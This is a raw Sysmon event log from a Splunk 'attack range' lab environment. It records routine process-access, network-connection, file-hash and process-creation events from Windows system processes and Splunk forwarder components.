10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000285076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:38.893{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53226-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000214165Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:41.687{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51173-false10.0.1.12-8000- 23542300x8000000000000000214164Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:43.076{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D24FF53E6199E174D4B82C5882529324,SHA256=E4CD05FFECF7B04FE0F95DF92646AB540D52DD91E5E6698477DFCBD179883CCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:43.166{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34D14B5A8BA23962023235C9122EDBA2,SHA256=B18BF69B5A9C98DF5684BBCCF2578A0BFF7562988702FCF664ACACA41AF6404D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:44.166{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BC30A753828539C58A5F140D9C1EF50,SHA256=12CF3B2F271A843C5F91E6745488BD81525851F55C3488A92F597EDEC29AC56C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214166Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:44.154{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C401CC0D3B37A29F7A954E5C19662D29,SHA256=699E45D2E04CDEB107EB76179C3530ABFFDB8921D42DE5831C145C838AC69179,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.502{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53227-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000214195Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.670{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214194Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.654{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E3D-6216-F603-000000003902}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214193Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.654{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214192Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.654{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214191Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.654{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214190Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.654{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214189Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.654{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214188Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.654{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214187Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.654{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214186Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.654{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214185Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.654{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214184Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.654{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0E3D-6216-F603-000000003902}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214183Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.654{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E3D-6216-F603-000000003902}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214182Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.655{4F8D34B0-0E3D-6216-F603-000000003902}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000214181Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.436{4F8D34B0-0E3D-6216-F503-000000003902}29723392C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000214180Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.202{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83225359077D4DBF9EEC1C0974CAE62D,SHA256=510D0BB9016D7ACEF26921816C9D815AAC078E748EE9F505D9C381F15CE32A2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:45.181{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ADFF76110906D3EA7975384F4B74C3C,SHA256=7D48528CCF6B17267738A4A6416DB70FD8603415D91F3B4DD7211356981AFA00,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214179Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E3D-6216-F503-000000003902}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214178Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214177Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214176Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214175Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214174Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dl